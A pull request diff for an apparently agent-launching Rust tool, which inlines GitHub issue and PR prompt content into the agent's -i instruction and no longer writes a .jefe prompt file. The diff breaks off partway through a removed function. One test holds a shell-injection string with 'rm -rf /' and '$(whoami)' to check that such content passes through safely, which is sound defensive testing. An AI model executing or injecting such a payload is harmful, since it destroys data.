### PR TITLE
Inline issue/PR prompt content into agent launch instruction (Fixes #315)

### DIFF
--- a/project-plans/issue315-plan.md
+++ b/project-plans/issue315-plan.md
@@ -1,0 +1,110 @@
+# Issue #315: Inline issue prompt into agent launch instruction
+
+## Problem
+
+Issue prompts are written to `.jefe/issue-prompt.md` on the agent's working
+copy before launch, then the launch instruction references that file path.
+This file gets in the way of git operations (it shows up in `git status`,
+clone/cleanup flows must explicitly ignore `.jefe/`, etc.). The issue asks us
+to determine whether modern llxprt-code and codepuppy can accept the entire
+prompt content inline via the `-i` flag, and if so, eliminate the file write.
+
+## Decision
+
+**Inline the prompt content directly into the agent launch instruction.** The
+`-i` flag already passes the instruction string as a positional argument; we
+simply pass the full issue/PR prompt markdown content instead of a short
+"Read and work on the GitHub issue described in .jefe/issue-prompt.md" string
+that references a file. This eliminates the on-disk prompt file write for both
+issues and PRs (consistency: both flows use `prepare_fresh_prompt_signature`).
+
+## Acceptance Matrix
+
+| # | Actor / Launch Path | Input | Observable Success | Observable Failure | Test |
+|---|---|---|---|---|---|
+| A1 | `prepare_fresh_prompt_signature` (Issue, LLxprt) | prompt content string | mode_flags end with `-i` + content+workflow instruction; no file path reference | n/a | `fresh_prompt.rs` unit test |
+| A2 | `prepare_fresh_prompt_signature` (Issue, CodePuppy) | prompt content string | mode_flags = [content+workflow instruction]; no file path | n/a | `fresh_prompt.rs` unit test |
+| A3 | `prepare_fresh_prompt_signature` (PR, LLxprt) | prompt content string | mode_flags end with `-i` + "Read and work on the GitHub PR described in..." preamble + content | n/a | `fresh_prompt.rs` unit test |
+| A4 | `prepare_fresh_prompt_signature` (PR, CodePuppy) | prompt content string | mode_flags = [PR instruction with content] | n/a | `fresh_prompt.rs` unit test |
+| A5 | `prepare_issue_target` (Local, Stop) | no prompt param needed | returns Ready without writing `.jefe/issue-prompt.md` | n/a | `issue_prep_tests.rs` |
+| A6 | `prepare_issue_target` (Local, Discard) | no prompt param needed | resets workdir, returns Ready, no `.jefe/issue-prompt.md` written | n/a | `issue_prep_tests.rs` |
+| A7 | `prepare_issue_target_force_reclone` (Local) | no prompt param needed | re-clones, returns Ready, no prompt file written | n/a | `issue_prep_tests.rs` |
+| A8 | RemotePrepRunner::run (Remote) | no prompt param needed | runs SSH prep (clone/checkout/dirty-guard) without writing prompt | n/a | `issue_prep_remote_tests.rs` planner |
+| A9 | `issues_send::dispatch_agent_chooser_confirm` | issue payload | launch_sig.mode_flags contains inline prompt content, not file path | n/a | `issue_send_modal_tests.rs` |
+| A10 | PR send path | PR payload | launch_sig.mode_flags contains inline PR prompt content | n/a | `app_input_tests.rs` |
+
+## Non-Goals
+
+- Changing the `.jefe/` ignore logic in `git_info/dirty_status.rs` — `.jefe/`
+  may still contain other runtime files and must remain ignored.
+- Changing how `write_prompt_to_target` / `write_pr_prompt_to_target` work —
+  these may become dead code after the refactor and will be removed if so,
+  but the safe-path-validation logic is preserved if still referenced.
+- Changing the PR prompt *formatting* (`format_pr_prompt`) or issue prompt
+  formatting (`format_issue_prompt`) — only the *delivery mechanism* changes.
+- Changing the `.jefe/pr-prompt.md` constant for PRs that still use
+  `write_pr_prompt_to_target` separately.
+
+## Vertical Slices
+
+### Slice 1: Change `prepare_fresh_prompt_signature` to accept prompt content
+- **Files**: `fresh_prompt.rs` (impl + tests)
+- **Change**: Third parameter changes from `prompt_relative_path: &str` to
+  `prompt_content: &str`. The instruction becomes:
+  - Issue: `"Read and work on the following GitHub issue.\n\n{content}\n\n{ISSUE_DELIVERY_WORKFLOW}"`
+  - PR: `"Read and work on the following GitHub PR.\n\n{content}"`
+- **RED**: New tests asserting content appears in instruction, file path does not.
+- **GREEN**: Update `fresh_prompt_instruction` to inline content.
+
+### Slice 2: Remove prompt file write from issue prep
+- **Files**: `issue_prep.rs` (impl + tests)
+- **Change**: Remove `prompt: &str` parameter from `prepare_issue_target`,
+  `prepare_local`, `run_local_policy_and_prep`, `prepare_issue_target_force_reclone`,
+  `force_reclone_local_with_url`. Remove `write_prompt_local`. Remove the
+  prompt write step from prep sequences.
+- **RED**: Tests asserting `.jefe/issue-prompt.md` is NOT written after prep.
+- **GREEN**: Remove the write calls.
+
+### Slice 3: Remove prompt file write from remote prep
+- **Files**: `issue_prep_remote.rs` (impl + tests)
+- **Change**: Remove `prompt: &str` from `RemotePrepRunner::run`,
+  `run_force_reclone`. Remove the prompt-write step (step 5) from remote
+  sequences.
+- **RED**: Planner tests asserting no `cat >` / `.jefe/issue-prompt.md` in
+  planned ops.
+- **GREEN**: Remove the prompt steps from the runner and planner.
+
+### Slice 4: Update all callers
+- **Files**: `issues_send.rs`, `transient_issue_send.rs`,
+  `transient_queue_ops.rs`, `prs_orchestration.rs`, `transient_pr_send.rs`
+- **Change**: Pass prompt content to `prepare_fresh_prompt_signature` instead
+  of file path. Remove prompt content from `prepare_issue_target` calls (the
+  prompt is now inlined into the launch signature, not written to disk).
+- **Tests**: Update `issue_send_modal_tests.rs`, `app_input_tests.rs`,
+  `runtime/commands_tests.rs`.
+
+## Scope Ledger
+
+| Item | Status |
+|---|---|
+| `fresh_prompt.rs` | Planned (impl + tests) |
+| `issue_prep.rs` | Planned (impl + tests) |
+| `issue_prep_remote.rs` | Planned (impl + tests) |
+| `issue_prep_tests.rs` | Planned (tests) |
+| `issue_prep_remote_tests.rs` | Planned (tests) |
+| `issues_send.rs` | Planned (caller update) |
+| `transient_issue_send.rs` | Planned (caller update) |
+| `transient_pr_send.rs` | Planned (caller update) |
+| `transient_queue_ops.rs` | Planned (caller update) |
+| `prs_orchestration.rs` | Planned (caller update) |
+| `issue_send_modal_tests.rs` | Planned (test update) |
+| `app_input_tests.rs` | Planned (test update) |
+| `remote_probe_tests.rs` | May need update |
+| `prs_integration_tests.rs` | May need update |
+| `runtime/commands_tests.rs` | May need update |
+| `issue_prep_predicate_tests.rs` | May need update |
+
+## Review Counters
+
+- OCR pre-PR: 0 / 2
+- OCR post-PR: 0 / 2

--- a/src/app_input/app_input_tests.rs
+++ b/src/app_input/app_input_tests.rs
@@ -1,4 +1,4 @@
-use super::prs_orchestration::{pr_send_info_from_state, write_pr_prompt};
+use super::prs_orchestration::pr_send_info_from_state;
 use super::*;
 use std::path::PathBuf;
 
@@ -647,17 +647,18 @@ fn state_for_pr_agent_chooser_confirm(
 }
 
 /// Agent-chooser confirm applies the reducer BEFORE the side effects: after
-/// the confirm dispatch the agent chooser is CLOSED in state, the send is
-/// recorded, and `{work_dir}/.jefe/pr-prompt.md` exists with non-empty content
-/// containing the PR number — proving `apply_and_persist(PrAgentChooserConfirm)`
-/// ran BEFORE `write_pr_prompt`/`launch_pr_agent`.
+/// the confirm dispatch the agent chooser is CLOSED in state and the send is
+/// recorded — proving `apply_and_persist(PrAgentChooserConfirm)` ran BEFORE
+/// `launch_pr_agent`.
 ///
-/// Exercises the dispatch ordering through observable state + filesystem
-/// effects. Since `AppStateHandle` cannot be constructed in unit tests, the
-/// test replicates the EXACT dispatch sequence on raw `AppState`:
+/// Issue #315: the PR prompt is inlined into the launch instruction, so no
+/// `.jefe/pr-prompt.md` file is written.
+///
+/// Exercises the dispatch ordering through observable state. Since
+/// `AppStateHandle` cannot be constructed in unit tests, the test replicates
+/// the EXACT dispatch sequence on raw `AppState`:
 /// (1) `pr_send_info_from_state` reads send info,
-/// (2) `state.apply(PrAgentChooserConfirm)` closes the chooser (reducer-before-side-effect),
-/// (3) `write_pr_prompt` writes the prompt file.
+/// (2) `state.apply(PrAgentChooserConfirm)` closes the chooser (reducer-before-side-effect).
 /// The `ctx` is `None` so `launch_pr_agent` would be guarded (no real spawn).
 ///
 /// @plan PLAN-20260624-PR-MODE.P11
@@ -674,7 +675,6 @@ fn test_pr_agent_chooser_confirm_applies_reducer_before_side_effects() {
             .duration_since(std::time::UNIX_EPOCH)
             .map_or(0, |d| d.as_nanos())
     ));
-    let prompt_path = temp_work_dir.join(".jefe").join("pr-prompt.md");
 
     let state = state_for_pr_agent_chooser_confirm(&agent_id, &temp_work_dir);
 
@@ -689,35 +689,18 @@ fn test_pr_agent_chooser_confirm_applies_reducer_before_side_effects() {
     assert!(!send_info.payload.pr_title.is_empty());
 
     // (2) Apply the PrAgentChooserConfirm reducer (closes chooser) — this runs
-    // BEFORE write_pr_prompt/launch in the real dispatch.
+    // BEFORE launch in the real dispatch.
     let after_confirm = state.apply(AppEvent::PrAgentChooserConfirm);
     assert!(
         after_confirm.prs_state.agent_chooser.is_none(),
         "PrAgentChooserConfirm must close the agent chooser BEFORE side effects"
     );
 
-    // (3) Write the prompt file (mirrors the dispatch's write_pr_prompt call).
-    let result = write_pr_prompt(&send_info.work_dir, &send_info.payload);
+    // Issue #315: no prompt file should be written — the prompt is inlined
+    // into the -i instruction.
     assert!(
-        result.is_ok(),
-        "write_pr_prompt should succeed: {:?}",
-        result.err()
-    );
-
-    // The prompt file exists with non-empty content containing the PR number.
-    assert!(
-        prompt_path.exists(),
-        "pr-prompt.md must exist at {prompt_path:?}"
-    );
-    let content = std::fs::read_to_string(&prompt_path)
-        .unwrap_or_else(|e| panic!("should read pr-prompt.md: {e}"));
-    assert!(
-        !content.is_empty(),
-        "pr-prompt.md content must be non-empty"
-    );
-    assert!(
-        content.contains('#') && content.contains("42"),
-        "pr-prompt.md should contain the PR number and a heading, got: {content}"
+        !temp_work_dir.join(".jefe").join("pr-prompt.md").exists(),
+        "no pr-prompt.md file should exist (prompt is inlined)"
     );
 
     // Cleanup.
@@ -891,7 +874,8 @@ fn issue_send_forces_pass_continue_false_on_launch_signature() {
     // dispatch_agent_chooser_confirm forces pass_continue = false before launch.
     // This calls the REAL production helper so removing the override would
     // cause this test to fail.
-    let launch_sig = prepare_issue_launch_signature(send_info.signature);
+    let issue_prompt = "Issue body content for app input test.";
+    let launch_sig = prepare_issue_launch_signature(send_info.signature, issue_prompt);
     assert!(
         !launch_sig.pass_continue,
         "issue-driven launches must force pass_continue = false"
@@ -900,8 +884,8 @@ fn issue_send_forces_pass_continue_false_on_launch_signature() {
         launch_sig
             .mode_flags
             .iter()
-            .any(|flag| flag.contains(".jefe/issue-prompt.md")),
-        "issue launch signature must include the issue prompt instruction"
+            .any(|flag| flag.contains(issue_prompt)),
+        "issue launch signature must include the inlined issue prompt content"
     );
 }
 

--- a/src/app_input/fresh_prompt.rs
+++ b/src/app_input/fresh_prompt.rs
@@ -42,27 +42,29 @@ const ISSUE_DELIVERY_WORKFLOW: &str = concat!(
     "complexity, source-size, safety, coverage, cross-platform, or CI requirements."
 );
 
-fn fresh_prompt_instruction(prompt_kind: FreshPromptKind, prompt_relative_path: &str) -> String {
-    let base = format!(
-        "Read and work on the GitHub {} described in {prompt_relative_path}",
-        prompt_kind.label()
-    );
+fn fresh_prompt_instruction(prompt_kind: FreshPromptKind, prompt_content: &str) -> String {
+    let label = prompt_kind.label();
+    let base = format!("Read and work on the following GitHub {label}.\n\n{prompt_content}");
     match prompt_kind {
-        FreshPromptKind::Issue => format!("{base}. {ISSUE_DELIVERY_WORKFLOW}"),
+        FreshPromptKind::Issue => format!("{base}\n\n{ISSUE_DELIVERY_WORKFLOW}"),
         FreshPromptKind::PullRequest => base,
     }
 }
 
 /// Transform a base signature into a fresh, non-resuming prompt launch.
+///
+/// The full prompt content is inlined directly into the instruction string
+/// (issue #315), eliminating the `.jefe/issue-prompt.md` / `.jefe/pr-prompt.md`
+/// file write that previously got in the way of git operations.
 #[must_use]
 pub(super) fn prepare_fresh_prompt_signature(
     mut sig: LaunchSignature,
     prompt_kind: FreshPromptKind,
-    prompt_relative_path: &str,
+    prompt_content: &str,
 ) -> LaunchSignature {
     sig.pass_continue = false;
     sig.code_puppy_quick_resume = false;
-    let instruction = fresh_prompt_instruction(prompt_kind, prompt_relative_path);
+    let instruction = fresh_prompt_instruction(prompt_kind, prompt_content);
     match sig.agent_kind {
         // LLxprt keeps the agent's persisted mode flags (e.g. `--yolo`) and
         // appends the fresh instruction. Replacing them here dropped `--yolo`,
@@ -184,18 +186,17 @@ mod tests {
             );
         }
     }
-
     #[test]
     fn llxprt_and_code_puppy_project_the_identical_issue_contract() {
         let llxprt = prepare_fresh_prompt_signature(
             base_sig(AgentKind::Llxprt),
             FreshPromptKind::Issue,
-            ".jefe/issue-prompt.md",
+            "issue content body",
         );
         let code_puppy = prepare_fresh_prompt_signature(
             base_sig(AgentKind::CodePuppy),
             FreshPromptKind::Issue,
-            ".jefe/issue-prompt.md",
+            "issue content body",
         );
 
         assert_eq!(llxprt.mode_flags.last(), code_puppy.mode_flags.first());
@@ -208,7 +209,7 @@ mod tests {
         let result = prepare_fresh_prompt_signature(
             base_sig(AgentKind::Llxprt),
             FreshPromptKind::Issue,
-            ".jefe/issue-prompt.md",
+            "issue content body",
         );
         assert!(!result.pass_continue);
         // Persisted mode flags are preserved and the instruction is appended.
@@ -217,7 +218,7 @@ mod tests {
             vec![
                 "--stale".to_owned(),
                 "-i".to_owned(),
-                fresh_prompt_instruction(FreshPromptKind::Issue, ".jefe/issue-prompt.md")
+                fresh_prompt_instruction(FreshPromptKind::Issue, "issue content body")
             ]
         );
     }
@@ -227,12 +228,15 @@ mod tests {
         let result = prepare_fresh_prompt_signature(
             base_sig(AgentKind::CodePuppy),
             FreshPromptKind::PullRequest,
-            ".jefe/pr-prompt.md",
+            "pr content body",
         );
         assert!(!result.pass_continue);
         assert_eq!(
             result.mode_flags,
-            vec!["Read and work on the GitHub PR described in .jefe/pr-prompt.md"]
+            vec![fresh_prompt_instruction(
+                FreshPromptKind::PullRequest,
+                "pr content body"
+            )]
         );
     }
 
@@ -241,14 +245,14 @@ mod tests {
         let result = prepare_fresh_prompt_signature(
             base_sig(AgentKind::CodePuppy),
             FreshPromptKind::Issue,
-            ".jefe/issue-prompt.md",
+            "issue content body",
         );
         assert!(!result.pass_continue);
         assert_eq!(
             result.mode_flags,
             vec![fresh_prompt_instruction(
                 FreshPromptKind::Issue,
-                ".jefe/issue-prompt.md"
+                "issue content body"
             )]
         );
     }
@@ -262,14 +266,14 @@ mod tests {
         let mut sig = base_sig(AgentKind::Llxprt);
         sig.mode_flags = vec!["--yolo".to_owned()];
         let result =
-            prepare_fresh_prompt_signature(sig, FreshPromptKind::Issue, ".jefe/issue-prompt.md");
+            prepare_fresh_prompt_signature(sig, FreshPromptKind::Issue, "issue content body");
         assert!(!result.pass_continue);
         assert_eq!(
             result.mode_flags,
             vec![
                 "--yolo".to_owned(),
                 "-i".to_owned(),
-                fresh_prompt_instruction(FreshPromptKind::Issue, ".jefe/issue-prompt.md")
+                fresh_prompt_instruction(FreshPromptKind::Issue, "issue content body")
             ]
         );
     }
@@ -282,13 +286,13 @@ mod tests {
         let mut sig = base_sig(AgentKind::Llxprt);
         sig.mode_flags.clear();
         let result =
-            prepare_fresh_prompt_signature(sig, FreshPromptKind::Issue, ".jefe/issue-prompt.md");
+            prepare_fresh_prompt_signature(sig, FreshPromptKind::Issue, "issue content body");
         assert!(!result.pass_continue);
         assert_eq!(
             result.mode_flags,
             vec![
                 "-i".to_owned(),
-                fresh_prompt_instruction(FreshPromptKind::Issue, ".jefe/issue-prompt.md")
+                fresh_prompt_instruction(FreshPromptKind::Issue, "issue content body")
             ]
         );
     }
@@ -301,14 +305,14 @@ mod tests {
         let mut sig = base_sig(AgentKind::Llxprt);
         sig.mode_flags = vec!["--yolo".to_owned(), "--continue".to_owned()];
         let result =
-            prepare_fresh_prompt_signature(sig, FreshPromptKind::PullRequest, ".jefe/pr-prompt.md");
+            prepare_fresh_prompt_signature(sig, FreshPromptKind::PullRequest, "pr content body");
         assert!(!result.pass_continue);
         assert_eq!(
             result.mode_flags,
             vec![
-                "--yolo",
-                "-i",
-                "Read and work on the GitHub PR described in .jefe/pr-prompt.md"
+                "--yolo".to_owned(),
+                "-i".to_owned(),
+                fresh_prompt_instruction(FreshPromptKind::PullRequest, "pr content body")
             ]
         );
     }
@@ -318,16 +322,16 @@ mod tests {
         let result = prepare_fresh_prompt_signature(
             base_sig(AgentKind::Llxprt),
             FreshPromptKind::PullRequest,
-            ".jefe/pr-prompt.md",
+            "pr content body",
         );
         assert!(!result.pass_continue);
         // Persisted mode flags are preserved and the instruction is appended.
         assert_eq!(
             result.mode_flags,
             vec![
-                "--stale",
-                "-i",
-                "Read and work on the GitHub PR described in .jefe/pr-prompt.md"
+                "--stale".to_owned(),
+                "-i".to_owned(),
+                fresh_prompt_instruction(FreshPromptKind::PullRequest, "pr content body")
             ]
         );
         issue_and_pr_fresh_signatures_retain_exact_selector();
@@ -336,14 +340,11 @@ mod tests {
     fn issue_and_pr_fresh_signatures_retain_exact_selector() {
         let selector =
             jefe::domain::LlxprtNpmPackageSelector::normalize("0.10.0-nightly.260712.21cb698b6");
-        for (kind, path) in [
-            (FreshPromptKind::Issue, ".jefe/issue-prompt.md"),
-            (FreshPromptKind::PullRequest, ".jefe/pr-prompt.md"),
-        ] {
+        for kind in [FreshPromptKind::Issue, FreshPromptKind::PullRequest] {
             let mut signature = base_sig(AgentKind::Llxprt);
             signature.llxprt_version = selector.clone();
             signature.code_puppy_version = "0.0.361-rc1".to_owned();
-            let prepared = prepare_fresh_prompt_signature(signature, kind, path);
+            let prepared = prepare_fresh_prompt_signature(signature, kind, "content body");
             assert_eq!(prepared.llxprt_version, selector);
             assert_eq!(prepared.code_puppy_version, "0.0.361-rc1");
         }

--- a/src/app_input/fresh_prompt.rs
+++ b/src/app_input/fresh_prompt.rs
@@ -43,12 +43,39 @@ const ISSUE_DELIVERY_WORKFLOW: &str = concat!(
 );
 
 fn fresh_prompt_instruction(prompt_kind: FreshPromptKind, prompt_content: &str) -> String {
+    let truncated = truncate_prompt_content(prompt_content);
     let label = prompt_kind.label();
-    let base = format!("Read and work on the following GitHub {label}.\n\n{prompt_content}");
+    let base = format!("Read and work on the following GitHub {label}.\n\n{truncated}");
     match prompt_kind {
         FreshPromptKind::Issue => format!("{base}\n\n{ISSUE_DELIVERY_WORKFLOW}"),
         FreshPromptKind::PullRequest => base,
     }
+}
+
+/// Maximum prompt content length (in bytes) before truncation.
+///
+/// Cross-platform safe bound that stays well under the smallest OS
+/// command-line length limit (Windows CreateProcess: ~32 KB). The
+/// `ISSUE_DELIVERY_WORKFLOW` appendix adds ~1.5 KB for issues.
+const MAX_PROMPT_CONTENT_BYTES: usize = 24_000;
+
+/// Truncate prompt content if it exceeds the byte budget.
+///
+/// Truncation adds a visible `[... truncated ...]` marker so the agent knows
+/// the content was cut. The cut happens at a character boundary to avoid
+/// splitting multi-byte UTF-8.
+fn truncate_prompt_content(content: &str) -> String {
+    if content.len() <= MAX_PROMPT_CONTENT_BYTES {
+        return content.to_owned();
+    }
+    // Find the last char boundary at or before the byte limit.
+    let mut end = MAX_PROMPT_CONTENT_BYTES;
+    while !content.is_char_boundary(end) {
+        end -= 1;
+    }
+    let mut truncated = content[..end].to_owned();
+    truncated.push_str("\n\n[... prompt truncated to stay within command-line length limits ...]");
+    truncated
 }
 
 /// Transform a base signature into a fresh, non-resuming prompt launch.
@@ -348,5 +375,81 @@ mod tests {
             assert_eq!(prepared.llxprt_version, selector);
             assert_eq!(prepared.code_puppy_version, "0.0.361-rc1");
         }
+    }
+
+    #[test]
+    fn prompt_content_is_inlined_into_mode_flags_not_referenced_as_file() {
+        // Issue #315: the full prompt content must appear verbatim inside the
+        // instruction (mode_flags), not as a file-path reference.
+        let unique_content = "UNIQUE_MARKER_42adb: this is the prompt body";
+        let result = prepare_fresh_prompt_signature(
+            base_sig(AgentKind::Llxprt),
+            FreshPromptKind::Issue,
+            unique_content,
+        );
+        let inlined: &String = result
+            .mode_flags
+            .last()
+            .unwrap_or_else(|| panic!("instruction must be present in mode_flags"));
+        assert!(
+            inlined.contains(unique_content),
+            "prompt content must be inlined: {inlined}"
+        );
+        assert!(
+            !inlined.contains(".jefe/"),
+            "must not reference .jefe file: {inlined}"
+        );
+    }
+
+    #[test]
+    fn truncate_preserves_short_content_unchanged() {
+        let short = "short prompt";
+        assert_eq!(truncate_prompt_content(short), short);
+    }
+
+    #[test]
+    fn truncate_adds_marker_and_stays_within_budget() {
+        let large = "x".repeat(MAX_PROMPT_CONTENT_BYTES + 5000);
+        let truncated = truncate_prompt_content(&large);
+        assert!(
+            truncated.len() <= MAX_PROMPT_CONTENT_BYTES + 200,
+            "truncated content must stay within budget: {} bytes",
+            truncated.len()
+        );
+        assert!(
+            truncated.contains("[... prompt truncated"),
+            "must include truncation marker"
+        );
+    }
+
+    #[test]
+    fn truncate_cuts_at_char_boundary_for_multibyte_utf8() {
+        // Build content that ends with a multi-byte char sequence right at the
+        // boundary so truncation must find the previous char boundary.
+        let filler = "a".repeat(MAX_PROMPT_CONTENT_BYTES - 2);
+        let multibyte_suffix = "🎉🎉";
+        let content = format!("{filler}{multibyte_suffix}");
+        let truncated = truncate_prompt_content(&content);
+        // Must not panic and must end with a valid UTF-8 string.
+        assert!(truncated.contains('a'));
+        assert!(truncated.contains("[... prompt truncated"));
+    }
+
+    #[test]
+    fn adversarial_shell_metacharacters_are_inlined_safely() {
+        // Issue #315 OCR finding: shell metacharacters from GitHub content
+        // must not break argument parsing. The instruction is passed via
+        // Command::args() (execvp), not shell interpolation, so metacharacters
+        // are safe — but verify they survive intact in mode_flags.
+        let adversarial = "'; rm -rf /; echo '\n$(whoami)\n`backtick`";
+        let result = prepare_fresh_prompt_signature(
+            base_sig(AgentKind::CodePuppy),
+            FreshPromptKind::Issue,
+            adversarial,
+        );
+        assert_eq!(result.mode_flags.len(), 1);
+        assert!(result.mode_flags[0].contains("rm -rf"));
+        assert!(result.mode_flags[0].contains("whoami"));
+        assert!(result.mode_flags[0].contains("backtick"));
     }
 }

--- a/src/app_input/issue_prep.rs
+++ b/src/app_input/issue_prep.rs
@@ -1,14 +1,13 @@
 //! Target-aware working-copy preparation for issue-driven agent launches.
 //!
-//! All working-copy prep (git clone/checkout/reset/clean, `.jefe` creation,
-//! issue-prompt writing) executes on the **same target** where the
-//! `LaunchSignature` runs:
+//! All working-copy prep (git clone/checkout/reset/clean) executes on the
+//! **same target** where the `LaunchSignature` runs:
 //!
 //! - **Local** (`remote.enabled` false): local git + filesystem.
 //! - **Remote** (`remote.enabled` true): noninteractive SSH (`ssh -T`) using
-//!   `RemoteRepositorySettings.login_user`/`host`/`run_as_user`. Prompt bytes
-//!   are transferred via stdin, never shell interpolation. The git boundary is
-//!   the remote host, never `RuntimeManager` (which owns tmux/PTY only).
+//!   `RemoteRepositorySettings.login_user`/`host`/`run_as_user`. The git
+//!   boundary is the remote host, never `RuntimeManager` (which owns
+//!   tmux/PTY only).
 //!
 //! One orchestration drives both `Stop` and `Discard` dirty policies and both
 //! local/remote targets, so the issue-send and dirty-confirm paths share an
@@ -23,7 +22,9 @@
 //! 5. `Stop` policy: return `Dirty` without altering the worktree.
 //! 6. `Discard` policy: clean after confirmation (reset --hard + clean -fd).
 //! 7. Resolve `origin/HEAD`, fetch, checkout/reset the default branch.
-//! 8. Create `.jefe/` and write the issue prompt **last**.
+//!
+//! The issue/PR prompt content is inlined directly into the launch
+//! instruction (issue #315); no `.jefe/` file is written.
 //!
 //! No app/runtime state locks are held during prep: prep runs before the
 //! launch path takes any lock.
@@ -38,12 +39,6 @@ use super::issue_git_prep::{
     discard_workdir_changes, ensure_workdir_cloned, ensure_workdir_with_origin,
     is_on_default_branch, is_workdir_dirty, prepare_issue_workdir, remove_workdir,
 };
-
-/// Relative path of the issue prompt inside the work dir. This is the single
-/// source of truth shared by the instruction-string construction in
-/// `issues_send::prepare_issue_launch_signature` and the on-disk prompt write
-/// in this module.
-pub(super) const ISSUE_PROMPT_RELATIVE_PATH: &str = ".jefe/issue-prompt.md";
 
 /// Policy for handling a dirty working copy during issue-send prep.
 #[derive(Debug, Clone, Copy, PartialEq, Eq)]
@@ -103,26 +98,27 @@ impl WorkTarget {
 ///
 /// This is the single orchestration shared by the initial send (`Stop`) and
 /// the dirty-confirm path (`Discard`), for both local and remote targets.
-/// Returns `Ready` when the worktree is on the default branch and the prompt
-/// is written, `Dirty` when the policy is `Stop` and uncommitted changes were
-/// detected.
+/// Returns `Ready` when the worktree is on the default branch. Returns
+/// `Dirty` when the policy is `Stop` and uncommitted changes were detected.
+///
+/// Issue #315: the prompt content is now inlined directly into the launch
+/// instruction (`-i`), so prep no longer writes a `.jefe/issue-prompt.md`
+/// file.
 ///
 /// # Errors
 ///
 /// Returns a human-readable error string for any failure (missing clone
-/// identity, clone failure, non-git directory, git command failure, prompt
-/// write failure, remote SSH failure). The caller surfaces it as
-/// `SendToAgentFailed`.
+/// identity, clone failure, non-git directory, git command failure, remote
+/// SSH failure). The caller surfaces it as `SendToAgentFailed`.
 pub(super) fn prepare_issue_target(
     target: &WorkTarget,
     work_dir: &Path,
     identity: Option<&CloneIdentity>,
     policy: DirtyPolicy,
-    prompt: &str,
 ) -> Result<PrepOutcome, String> {
     match target {
-        WorkTarget::Local => prepare_local(work_dir, identity, policy, prompt),
-        WorkTarget::Remote(remote) => prepare_remote(remote, work_dir, identity, policy, prompt),
+        WorkTarget::Local => prepare_local(work_dir, identity, policy),
+        WorkTarget::Remote(remote) => prepare_remote(remote, work_dir, identity, policy),
     }
 }
 
@@ -146,13 +142,10 @@ pub(super) fn prepare_issue_target_force_reclone(
     target: &WorkTarget,
     work_dir: &Path,
     identity: &CloneIdentity,
-    prompt: &str,
 ) -> Result<PrepOutcome, String> {
     match target {
-        WorkTarget::Local => prepare_local_force_reclone(work_dir, identity, prompt),
-        WorkTarget::Remote(remote) => {
-            prepare_remote_force_reclone(remote, work_dir, identity, prompt)
-        }
+        WorkTarget::Local => prepare_local_force_reclone(work_dir, identity),
+        WorkTarget::Remote(remote) => prepare_remote_force_reclone(remote, work_dir, identity),
     }
 }
 
@@ -166,11 +159,10 @@ pub(super) fn prepare_issue_target_force_reclone(
 fn prepare_local_force_reclone(
     work_dir: &Path,
     identity: &CloneIdentity,
-    prompt: &str,
 ) -> Result<PrepOutcome, String> {
     // 1. Resolve the clone URL BEFORE any destructive action.
     let clone_url = identity.clone_url();
-    force_reclone_local_with_url(work_dir, &clone_url, prompt)
+    force_reclone_local_with_url(work_dir, &clone_url)
 }
 
 /// The destructive force-reclone sequence with an already-resolved clone URL:
@@ -185,7 +177,6 @@ fn prepare_local_force_reclone(
 pub(super) fn force_reclone_local_with_url(
     work_dir: &Path,
     clone_url: &str,
-    prompt: &str,
 ) -> Result<PrepOutcome, String> {
     // Defense-in-depth: refuse catastrophic targets (root, empty, top-level)
     // even though the user confirmed. This guards against a misconfigured
@@ -206,7 +197,7 @@ pub(super) fn force_reclone_local_with_url(
     // clone/prep error that hides the destruction.
     ensure_workdir_cloned(work_dir, Some(clone_url))
         .map_err(|e| format!("After removing the mismatched work_dir, the clone failed (the original working copy at {} is already gone): {e}", work_dir.display()))?;
-    run_local_policy_and_prep(work_dir, DirtyPolicy::Stop, prompt)
+    run_local_policy_and_prep(work_dir, DirtyPolicy::Stop)
         .map_err(|e| format!("After force-recloning {} (the original working copy is already gone), post-clone prep failed: {e}", work_dir.display()))
 }
 
@@ -215,7 +206,6 @@ fn prepare_local(
     work_dir: &Path,
     identity: Option<&CloneIdentity>,
     policy: DirtyPolicy,
-    prompt: &str,
 ) -> Result<PrepOutcome, String> {
     jefe::services::validate_local_path(work_dir)?;
     let owned_url = identity.map(CloneIdentity::clone_url);
@@ -226,22 +216,18 @@ fn prepare_local(
             return Ok(PrepOutcome::OriginMismatch { actual, expected });
         }
     }
-    run_local_policy_and_prep(work_dir, policy, prompt)
+    run_local_policy_and_prep(work_dir, policy)
 }
 
 /// Shared local sequence after the worktree exists: dirty check → policy →
-/// prep → prompt write.
+/// prep.
 ///
 /// Issue #338: a clean working copy that is **not on the default branch**
 /// also triggers the confirm modal (Stop) — silently switching branches is
 /// surprising. When the user confirms (Discard), uncommitted changes are
 /// discarded (if any) and the checkout+pull to the default branch proceeds
 /// as normal.
-fn run_local_policy_and_prep(
-    work_dir: &Path,
-    policy: DirtyPolicy,
-    prompt: &str,
-) -> Result<PrepOutcome, String> {
+fn run_local_policy_and_prep(work_dir: &Path, policy: DirtyPolicy) -> Result<PrepOutcome, String> {
     let dirty = is_workdir_dirty(work_dir)?;
     // Only evaluate branch position when clean: a dirty tree triggers the
     // modal regardless of which branch it is on.
@@ -275,112 +261,10 @@ fn run_local_policy_and_prep(
             }
         },
     }
-    write_prompt_local(work_dir, prompt)?;
     Ok(PrepOutcome::Ready)
 }
 
-/// Write the issue prompt to the local filesystem.
-fn write_prompt_local(work_dir: &Path, prompt: &str) -> Result<(), String> {
-    let prompt_path = work_dir.join(ISSUE_PROMPT_RELATIVE_PATH);
-    std::fs::create_dir_all(work_dir.join(".jefe"))
-        .map_err(|e| format!("Failed to create .jefe dir: {e}"))?;
-    std::fs::write(&prompt_path, prompt).map_err(|e| format!("Failed to write issue prompt: {e}"))
-}
-
 // ──────────────────────────────────────────────────────────────────────────
-// Reusable safe target prompt writer (shared by issue + PR prep)
-// ──────────────────────────────────────────────────────────────────────────
-
-/// Validate that a prompt relative path is safe: it must start with `.jefe/`,
-/// be relative (no leading `/`), and contain no path-traversal components
-/// (`..`). This prevents absolute-path injection and directory traversal when
-/// the path is joined with the work dir or interpolated into a remote shell.
-pub(super) fn validate_prompt_relative_path(relative_path: &str) -> Result<(), String> {
-    if !relative_path.starts_with(".jefe/") {
-        return Err(format!(
-            "Prompt path {relative_path:?} must start with '.jefe/'"
-        ));
-    }
-    if relative_path.starts_with('/') {
-        return Err(format!(
-            "Prompt path {relative_path:?} must be relative, not absolute"
-        ));
-    }
-    if Path::new(relative_path)
-        .components()
-        .any(|c| matches!(c, std::path::Component::ParentDir))
-    {
-        return Err(format!(
